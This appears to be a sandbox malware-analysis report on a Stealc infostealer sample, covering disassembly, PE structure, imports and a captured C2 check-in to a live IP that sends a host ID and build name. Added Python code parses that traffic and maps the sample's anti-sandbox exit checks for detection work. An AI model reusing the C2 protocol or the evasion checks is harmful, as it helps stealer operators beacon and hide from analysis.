                                    xor cl, cl
                                    jmp 00007FEBA493F531h
                                    mov byte ptr [ebp-00000090h], FFFFFFFEh
                                    fabs
                                    fxch st(0), st(1)
                                    fabs
                                    fxch st(0), st(1)
                                    fpatan
                                    or cl, cl
                                    je 00007FEBA493F526h
                                    fldpi
                                    fsubrp st(1), st(0)
                                    or ch, ch
                                    je 00007FEBA493F524h
                                    fchs
                                    ret
                                    fabs
                                    fld st(0), st(0)
                                    fld st(0), st(0)
                                    fld1
                                    fsubrp st(1), st(0)
                                    fxch st(0), st(1)
                                    fld1
                                    faddp st(1), st(0)
                                    fmulp st(1), st(0)
                                    ftst
                                    wait
                                    fstsw word ptr [ebp-000000A0h]
                                    wait
                                    test byte ptr [ebp-0000009Fh], 00000001h
                                    jne 00007FEBA493F527h
                                    xor ch, ch
                                    fsqrt
                                    ret
                                    pop eax
                                    jmp 00007FEBA4943D3Fh
                                    fstp st(0)
                                    fld tbyte ptr [004497EAh]
                                    ret
                                    fstp st(0)
                                    or cl, cl
                                    je 00007FEBA493F52Dh
                                    fstp st(0)
                                    fldpi
                                    or ch, ch
                                    je 00007FEBA493F524h
                                    fchs
                                    ret
                                    fstp st(0)
                                    fldz
                                    or ch, ch
                                    je 00007FEBA493F519h
                                    fchs
                                    ret
                                    fstp st(0)
                                    jmp 00007FEBA4943D15h
                                    fstp st(0)
                                    mov cl, ch
                                    jmp 00007FEBA493F522h
                                    call 00007FEBA493F4EEh
                                    jmp 00007FEBA4943D20h
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    Programming Language:
                                    • [C++] VS2008 build 21022
                                    • [ASM] VS2008 build 21022
                                    • [ C ] VS2008 build 21022
                                    • [IMP] VS2005 build 50727
                                    • [RES] VS2008 build 21022
                                    • [LNK] VS2008 build 21022
                                    Name | Virtual Address | Virtual Size | Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4772c | 0x3c | .text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5b000 | 0x12b58 | .rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25f000 | 0xa48 | .reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2690 | 0x40 | .text
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x19c | .text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                    .text | 0x1000 | 0x4708c | 0x47200 | 372844af899a298d533027599ff622cf | False | 0.7336816234622144 | data | 7.012763407505116 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .data | 0x49000 | 0x1185c | 0x6000 | 658aeadd60814ab08f977223f9ee6724 | False | 0.0777587890625 | Matlab v4 mat-file (little endian) n2, sparse, rows 0, columns 0 | 0.9052237577489807 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc | 0x5b000 | 0x203b58 | 0x12c00 | 5925f1e123334200b740411e63c143d8 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc | 0x25f000 | 0x14be | 0x1600 | d7eeaff98ac8f72dfe52e310f9c3ae34 | False | 0.4055397727272727 | data | 3.973364894187828 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                    XUBONAVEGUCIZAKUFAMABAWADUJATA | 0x65130 | 0x1e31 | ASCII text, with very long lines (7729), with no line terminators | Tamil | India | 0.5879156423858196
                                    XUBONAVEGUCIZAKUFAMABAWADUJATA | 0x65130 | 0x1e31 | ASCII text, with very long lines (7729), with no line terminators | Tamil | Sri Lanka | 0.5879156423858196
                                    RT_CURSOR | 0x66fc0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.2953091684434968
                                    RT_CURSOR | 0x67e68 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.46705776173285196
                                    RT_CURSOR | 0x68710 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.5361271676300579
                                    RT_CURSOR | 0x68ca8 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.4375
                                    RT_CURSOR | 0x68dd8 | 0xb0 | Device independent bitmap graphic, 16 x 32 x 1, image size 0 | | | 0.44886363636363635
                                    RT_CURSOR | 0x68eb0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.27238805970149255
                                    RT_CURSOR | 0x69d58 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.375
                                    RT_CURSOR | 0x6a600 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.5057803468208093
                                    RT_CURSOR | 0x6ab98 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.30943496801705755
                                    RT_CURSOR | 0x6ba40 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.427797833935018
                                    RT_CURSOR | 0x6c2e8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.5469653179190751
                                    RT_ICON | 0x5b7f0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | India | 0.532258064516129
                                    RT_ICON | 0x5b7f0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Tamil | Sri Lanka | 0.532258064516129
                                    RT_ICON | 0x5beb8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | India | 0.4107883817427386
                                    RT_ICON | 0x5beb8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Tamil | Sri Lanka | 0.4107883817427386
                                    RT_ICON | 0x5e460 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | India | 0.4441489361702128
                                    RT_ICON | 0x5e460 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Tamil | Sri Lanka | 0.4441489361702128
                                    RT_ICON | 0x5e8f8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Tamil | India | 0.36886993603411516
                                    RT_ICON | 0x5e8f8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Tamil | Sri Lanka | 0.36886993603411516
                                    RT_ICON | 0x5f7a0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Tamil | India | 0.5130866425992779
                                    RT_ICON | 0x5f7a0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Tamil | Sri Lanka | 0.5130866425992779
                                    RT_ICON | 0x60048 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | India | 0.5841013824884793
                                    RT_ICON | 0x60048 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | Sri Lanka | 0.5841013824884793
                                    RT_ICON | 0x60710 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Tamil | India | 0.6502890173410405
                                    RT_ICON | 0x60710 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Tamil | Sri Lanka | 0.6502890173410405
                                    RT_ICON | 0x60c78 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Tamil | India | 0.462448132780083
                                    RT_ICON | 0x60c78 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Tamil | Sri Lanka | 0.462448132780083
                                    RT_ICON | 0x63220 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Tamil | India | 0.475375234521576
                                    RT_ICON | 0x63220 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Tamil | Sri Lanka | 0.475375234521576
                                    RT_ICON | 0x642c8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Tamil | India | 0.45778688524590166
                                    RT_ICON | 0x642c8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Tamil | Sri Lanka | 0.45778688524590166
                                    RT_ICON | 0x64c50 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Tamil | India | 0.5106382978723404
                                    RT_ICON | 0x64c50 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Tamil | Sri Lanka | 0.5106382978723404
                                    RT_DIALOG | 0x6cad8 | 0x58 | data | | | 0.8977272727272727
                                    RT_STRING | 0x6cb30 | 0x374 | data | Tamil | India | 0.46945701357466063
                                    RT_STRING | 0x6cb30 | 0x374 | data | Tamil | Sri Lanka | 0.46945701357466063
                                    RT_STRING | 0x6cea8 | 0x2ae | data | Tamil | India | 0.478134110787172
                                    RT_STRING | 0x6cea8 | 0x2ae | data | Tamil | Sri Lanka | 0.478134110787172
                                    RT_STRING | 0x6d158 | 0x4e8 | data | Tamil | India | 0.4434713375796178
                                    RT_STRING | 0x6d158 | 0x4e8 | data | Tamil | Sri Lanka | 0.4434713375796178
                                    RT_STRING | 0x6d640 | 0x514 | data | Tamil | India | 0.4276923076923077
                                    RT_STRING | 0x6d640 | 0x514 | data | Tamil | Sri Lanka | 0.4276923076923077
                                    RT_ACCELERATOR | 0x66f68 | 0x58 | data | Tamil | India | 0.7954545454545454
                                    RT_ACCELERATOR | 0x66f68 | 0x58 | data | Tamil | Sri Lanka | 0.7954545454545454
                                    RT_GROUP_CURSOR | 0x68c78 | 0x30 | data | | | 0.9375
                                    RT_GROUP_CURSOR | 0x68e88 | 0x22 | data | | | 1.0588235294117647
                                    RT_GROUP_CURSOR | 0x6ab68 | 0x30 | data | | | 0.9375
                                    RT_GROUP_CURSOR | 0x6c850 | 0x30 | data | | | 0.9375
                                    RT_GROUP_ICON | 0x5e8c8 | 0x30 | data | Tamil | India | 0.9375
                                    RT_GROUP_ICON | 0x5e8c8 | 0x30 | data | Tamil | Sri Lanka | 0.9375
                                    RT_GROUP_ICON | 0x650b8 | 0x76 | data | Tamil | India | 0.6694915254237288
                                    RT_GROUP_ICON | 0x650b8 | 0x76 | data | Tamil | Sri Lanka | 0.6694915254237288
                                    RT_VERSION | 0x6c880 | 0x254 | data | | | 0.535234899328859
                                    DLL | Import
                                    KERNEL32.dll | GlobalCompact, CreateProcessW, InterlockedIncrement, GetCurrentProcess, GetLogicalDriveStringsW, CreateJobObjectW, SetComputerNameW, SetVolumeMountPointW, GetComputerNameW, GetTickCount, GetCommConfig, ClearCommBreak, GetConsoleAliasExesW, EnumTimeFormatsW, TlsSetValue, GetEnvironmentStrings, SetFileShortNameW, ReadConsoleInputA, GetVersionExW, GetFileAttributesA, GlobalMemoryStatus, GetModuleFileNameW, GetShortPathNameA, VerifyVersionInfoW, InterlockedExchange, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, DefineDosDeviceW, CreateNamedPipeA, SetFileAttributesA, LoadLibraryA, GetNumberFormatW, OpenJobObjectW, SetEnvironmentVariableA, GetCurrentDirectoryA, OpenEventW, LCMapStringW, CommConfigDialogW, GetTimeFormatW, GetTempFileNameW, HeapAlloc, HeapReAlloc, GetStartupInfoW, RaiseException, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, HeapCreate, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, TlsGetValue, TlsAlloc, TlsFree, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetModuleHandleA, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, WideCharToMultiByte, HeapSize, GetLocaleInfoA, LCMapStringA, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA
                                    GDI32.dll | GetCharWidth32A
                                    Language of compilation system | Country where language is spoken | Map
                                    Tamil | India |
                                    Tamil | Sri Lanka |
                                    Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                    2024-10-24T15:57:02.114246+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 109.107.157.208 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 24, 2024 15:57:01.002331972 CEST | 49730 | 80 | 192.168.2.4 | 109.107.157.208
Oct 24, 2024 15:57:01.008313894 CEST | 80 | 49730 | 109.107.157.208 | 192.168.2.4
Oct 24, 2024 15:57:01.008466959 CEST | 49730 | 80 | 192.168.2.4 | 109.107.157.208
Oct 24, 2024 15:57:01.008663893 CEST | 49730 | 80 | 192.168.2.4 | 109.107.157.208
Oct 24, 2024 15:57:01.015043020 CEST | 80 | 49730 | 109.107.157.208 | 192.168.2.4
Oct 24, 2024 15:57:01.837510109 CEST | 80 | 49730 | 109.107.157.208 | 192.168.2.4
Oct 24, 2024 15:57:01.837606907 CEST | 49730 | 80 | 192.168.2.4 | 109.107.157.208
Oct 24, 2024 15:57:01.869196892 CEST | 49730 | 80 | 192.168.2.4 | 109.107.157.208
Oct 24, 2024 15:57:01.874923944 CEST | 80 | 49730 | 109.107.157.208 | 192.168.2.4
Oct 24, 2024 15:57:02.114142895 CEST | 80 | 49730 | 109.107.157.208 | 192.168.2.4
Oct 24, 2024 15:57:02.114245892 CEST | 49730 | 80 | 192.168.2.4 | 109.107.157.208
Oct 24, 2024 15:57:07.489281893 CEST | 80 | 49730 | 109.107.157.208 | 192.168.2.4
Oct 24, 2024 15:57:07.489382029 CEST | 80 | 49730 | 109.107.157.208 | 192.168.2.4
Oct 24, 2024 15:57:07.489474058 CEST | 49730 | 80 | 192.168.2.4 | 109.107.157.208
Oct 24, 2024 15:57:07.489475012 CEST | 49730 | 80 | 192.168.2.4 | 109.107.157.208
Oct 24, 2024 15:57:21.535186052 CEST | 49730 | 80 | 192.168.2.4 | 109.107.157.208
                                    • 109.107.157.208
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 109.107.157.208 | 80 | 8 | C:\Users\user\Desktop\is65NMeWkV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:57:01.008663893 CEST | 90 | OUT | GET / HTTP/1.1
Host: 109.107.157.208
Connection: Keep-Alive
Cache-Control: no-cache
Oct 24, 2024 15:57:01.837510109 CEST | 203 | IN | HTTP/1.1 200 OK
Date: Thu, 24 Oct 2024 13:57:01 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Oct 24, 2024 15:57:01.869196892 CEST | 419 | OUT | POST /49aaa1bd4c594849.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IIEHJEHDBGHIDGDGHCBG
Host: 109.107.157.208
Content-Length: 217
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 45 48 44 42 47 48 49 44 47 44 47 48 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 37 34 30 30 38 30 31 30 32 46 32 34 32 30 33 32 35 35 37 35 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 45 48 44 42 47 48 49 44 47 44 47 48 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 45 48 44 42 47 48 49 44 47 44 47 48 43 42 47 2d 2d 0d 0a
Data Ascii: ------IIEHJEHDBGHIDGDGHCBGContent-Disposition: form-data; name="hwid"AB740080102F2420325575------IIEHJEHDBGHIDGDGHCBGContent-Disposition: form-data; name="build"LogsDiller------IIEHJEHDBGHIDGDGHCBG--
Oct 24, 2024 15:57:02.114142895 CEST | 210 | IN | HTTP/1.1 200 OK
Date: Thu, 24 Oct 2024 13:57:01 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s=
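The check-in above, parsed offline. This is an added example, not code from the Joe Sandbox report and not Stealc's own code: it rebuilds the 217-byte multipart body from the Data Ascii dump (with the CRLFs the dump flattens), extracts the hwid and build fields, decodes the base64 reply (YmxvY2s= is "block"), and lists the traits of this one capture that a detection could key on. Those traits, a POST with no User-Agent header, a multipart body carrying exactly hwid and build, and a boundary made only of capital letters, are observations from this single session and an assumption about other Stealc traffic, not a rule backed by the report; the body of Suricata SID 2044243 is not reproduced.

```python
"""Offline parse of the captured Stealc check-in (request + reply) shown above."""
import base64
import re

# Reconstructed from the report's "Data Ascii" dump of the POST body; the
# captured Content-Length for it is 217, which the parse below must reproduce.
BOUNDARY = "----IIEHJEHDBGHIDGDGHCBG"
POST_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    "AB740080102F2420325575\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="build"\r\n\r\n'
    "LogsDiller\r\n"
    f"--{BOUNDARY}--\r\n"
).encode()

# Request line and headers as captured: note that no User-Agent was sent.
REQUEST = ("POST", "/49aaa1bd4c594849.php", {
    "Content-Type": f"multipart/form-data; boundary={BOUNDARY}",
    "Host": "109.107.157.208",
    "Content-Length": "217",
    "Connection": "Keep-Alive",
    "Cache-Control": "no-cache",
})
REPLY_BODY = b"YmxvY2s="   # the 8-byte body of the second 200 OK


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Minimal multipart/form-data parser: returns {field name: value}."""
    delim = b"--" + boundary.encode()
    fields = {}
    for part in body.split(delim)[1:]:
        if part.startswith(b"--"):        # "--boundary--" closes the body
            break
        head, _, data = part.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]*)"', head)
        if m:
            if data.endswith(b"\r\n"):    # CRLF before the next delimiter is framing, not payload
                data = data[:-2]
            fields[m.group(1).decode()] = data.decode(errors="replace")
    return fields


def decode_reply(body: bytes) -> str:
    """The C2 answers with bare base64; YmxvY2s= decodes to 'block'."""
    return base64.b64decode(body, validate=True).decode()


def checkin_indicators(method: str, headers: dict, body: bytes) -> list:
    """Traits of this capture a detection could key on. Assumption: they are taken
    from this one session and have not been validated against other Stealc samples."""
    hits = []
    hdrs = {k.lower(): v for k, v in headers.items()}
    ctype = hdrs.get("content-type", "")
    m = re.search(r"boundary=([^;\s]+)", ctype)
    if method == "POST" and "user-agent" not in hdrs:
        hits.append("POST without User-Agent")
    if m and ctype.startswith("multipart/form-data"):
        boundary = m.group(1)
        if re.fullmatch(r"-*[A-Z]+", boundary):
            hits.append("letters-only multipart boundary")
        if set(parse_multipart(body, boundary)) == {"hwid", "build"}:
            hits.append("multipart body with exactly hwid and build")
    return hits


if __name__ == "__main__":
    method, path, headers = REQUEST
    print(f"{method} {path}", parse_multipart(POST_BODY, BOUNDARY))
    print("reply:", decode_reply(REPLY_BODY))
    print("indicators:", checkin_indicators(method, headers, POST_BODY))
```

The hwid value is what the sample reports as its machine identifier and the build string identifies the stealer build; both are worth carrying into a hunt query, since they are what the operator's panel keys logs on.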


                                    Target ID:0
                                    Start time:09:56:59
                                    Start date:24/10/2024
                                    Path:C:\Users\user\Desktop\is65NMeWkV.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\is65NMeWkV.exe"
                                    Imagebase:0x400000
                                    File size:399'360 bytes
                                    MD5 hash:5D0D37171E8ED9FC0B97E8F858133802
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1898042742.00000000007F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1898071259.000000000086E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1700998276.0000000002350000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    Reputation:low
                                    Has exited:true

                                    Target ID:3
                                    Start time:09:57:01
                                    Start date:24/10/2024
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 1220
                                    Imagebase:0x60000
                                    File size:483'680 bytes
                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true


                                      Execution Graph

                                      Execution Coverage:5.7%
                                      Dynamic/Decrypted Code Coverage:68.5%
                                      Signature Coverage:12.2%
                                      Total number of Nodes:1416
                                      Total number of Limit Nodes:28
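The execution_graph dump that follows is a flat token stream: a node is written as an id, an address and zero or more API names, and an edge as id->id. Inside it, the chain that begins at address 4011d0 is the sample's environment check: GetSystemInfo, VirtualAllocExNuma, GlobalMemoryStatusEx and GetUserDefaultLangID each sit one edge away from an ExitProcess node. The following is an added example, not part of the Joe Sandbox report: a parser for that token format plus two queries over it, which ExitProcess nodes a start node can reach and which API-bearing node gates each exit. The SAMPLE string is an excerpt of tokens copied from the dump below, limited to that chain; the heuristic that node ids are five decimal digits and addresses six or seven hex digits is an assumption fitted to this dump, not a documented format.

```python
"""Parse a Joe Sandbox execution_graph token dump and find the checks gating ExitProcess."""
import re
from collections import defaultdict, deque

NODE_ID = re.compile(r"^\d{5}$")            # assumption: node ids are 5 decimal digits
ADDR = re.compile(r"^[0-9a-f]{6,7}$")        # assumption: addresses are 6-7 lowercase hex digits
EDGE = re.compile(r"^(\d{5})->(\d{5})$")

# Constructed sample: tokens copied from the report's dump, limited to the
# environment-check chain that begins at node 28961 (address 4011d0).
SAMPLE = """
28961 4011d0 28962 4011e8 28961->28962 28963 401217 28962->28963 28964 40120f ExitProcess 28962->28964
28965 401160 GetSystemInfo 28963->28965 28966 401184 28965->28966 28967 40117c ExitProcess 28965->28967
28968 401110 GetCurrentProcess VirtualAllocExNuma 28966->28968 28969 401141 ExitProcess 28968->28969
28970 401149 28968->28970 29201 4010a0 VirtualAlloc 28970->29201 28973 401220 29205 4189b0 28973->29205
28976 40129a 28979 416770 GetUserDefaultLangID 28976->28979 28977 401292 ExitProcess
28978 401249 __aulldiv 28978->28976 28978->28977 28980 4167d3 GetUserDefaultLCID 28981 416792
28979->28980 28979->28981 28980->28828 28981->28980 28982 4167c1 ExitProcess 28981->28982
28983 4167a3 ExitProcess 28981->28983 28984 4167b7 ExitProcess 28981->28984
28985 4167cb ExitProcess 28981->28985 28986 4167ad ExitProcess 28981->28986
29203 4010c2 ctype 29201->29203 29202 4010fd 29202->28973 29203->29202
29204 4010e2 VirtualFree 29203->29204 29204->29202
29206 401233 GlobalMemoryStatusEx 29205->29206 29206->28978
"""


def parse_graph(text):
    """Return (nodes, succ, pred); nodes maps id -> (address, description)."""
    nodes, succ, pred = {}, defaultdict(list), defaultdict(list)
    tokens = text.split()
    current, i = None, 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.match(tok)
        if m:
            succ[m.group(1)].append(m.group(2))
            pred[m.group(2)].append(m.group(1))
            i += 1
        elif NODE_ID.match(tok) and i + 1 < len(tokens) and ADDR.match(tokens[i + 1]):
            current = tok
            nodes[current] = [tokens[i + 1], []]
            i += 2
        else:
            if current is not None:          # description word of the current node
                nodes[current][1].append(tok)
            i += 1
    return {k: (addr, " ".join(words)) for k, (addr, words) in nodes.items()}, succ, pred


def description(nodes, node_id):
    return nodes.get(node_id, ("", ""))[1]   # ids seen only in edges have no description


def reachable_exits(nodes, succ, start):
    """Addresses of every ExitProcess node reachable from start (depth-first walk)."""
    seen, stack, exits = set(), [start], set()
    while stack:
        n = stack.pop()
        if n in seen:
            continue
        seen.add(n)
        if "ExitProcess" in description(nodes, n):
            exits.add(nodes[n][0])
        stack.extend(succ.get(n, []))
    return sorted(exits)


def exit_gates(nodes, pred):
    """For each ExitProcess node, the nearest ancestors that carry an API name, i.e. the
    calls whose result decides the exit. Undescribed nodes are walked through."""
    gates = {}
    for n, (addr, desc) in nodes.items():
        if "ExitProcess" not in desc:
            continue
        found, seen, queue = set(), {n}, deque(pred.get(n, []))
        while queue:
            p = queue.popleft()
            if p in seen:
                continue
            seen.add(p)
            if description(nodes, p):
                found.add(description(nodes, p))
            else:
                queue.extend(pred.get(p, []))
        gates[addr] = sorted(found)
    return gates


NODES, SUCC, PRED = parse_graph(SAMPLE)

if __name__ == "__main__":
    print("exits reachable from 4011d0:", reachable_exits(NODES, SUCC, "28961"))
    for addr, gate in sorted(exit_gates(NODES, PRED).items()):
        print(f"ExitProcess @ {addr} gated by {gate or ['(no API on path)']}")
```

Run on the full dump instead of SAMPLE, the same two queries list every exit the sample can take before it reaches its C2 code, which is the quickest way to see which sandbox traits (memory size, NUMA support, locale) a detonation environment has to satisfy for the sample to proceed.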
                                      execution_graph 30271 409440 strlen malloc strcpy_s free std::exception::exception 30329 2311c35 110 API calls 30308 2309b37 7 API calls 30331 41ce48 LeaveCriticalSection type_info::_Type_info_dtor 30273 41b050 6 API calls 3 library calls 30370 2311525 strtok_s strtok_s lstrlen lstrcpy codecvt 30311 230932a ??2@YAPAXI RaiseException allocator 30372 406f60 memcpy 30275 41dc60 atexit 30276 23115b3 18 API calls codecvt 30373 410765 279 API calls 30334 417667 lstrcpy 30336 41b270 5 API calls 2 library calls 30229 2300005 30234 230092b GetPEB 30229->30234 30231 2300030 30235 230003c 30231->30235 30234->30231 30236 2300049 30235->30236 30250 2300e0f SetErrorMode SetErrorMode 30236->30250 30241 2300265 30242 23002ce VirtualProtect 30241->30242 30244 230030b 30242->30244 30243 2300439 VirtualFree 30248 23004be 30243->30248 30249 23005f4 LoadLibraryA 30243->30249 30244->30243 30245 23004e3 LoadLibraryA 30245->30248 30247 23008c7 30248->30245 30248->30249 30249->30247 30251 2300223 30250->30251 30252 2300d90 30251->30252 30253 2300dad 30252->30253 30254 2300dbb GetPEB 30253->30254 30255 2300238 VirtualAlloc 30253->30255 30254->30255 30255->30241 30374 231d106 41 API calls __amsg_exit 30280 2316a0a ExitProcess 30281 231cd97 170 API calls 2 library calls 30282 231be78 162 API calls 2 library calls 30283 41bc11 71 API calls 2 library calls 30378 230fd67 152 API calls 30381 232e553 __scrt_dllmain_crt_thread_attach __scrt_initialize_crt __scrt_get_show_window_mode __scrt_acquire_startup_lock __scrt_release_startup_lock 30341 231140b strtok_s 30342 2316c57 689 API calls 30343 231102b strtok_s lstrlen lstrcpy 30382 2316d18 643 API calls 30284 41ac2c 71 API calls ctype 30285 2316a40 6 API calls 30286 2313b7d 91 API calls 2 library calls 30288 4090c3 5 API calls allocator 30345 23104b7 88 API calls 30346 2310cb6 30 API calls 30256 7f10f4 30257 7f1103 30256->30257 30260 7f1894 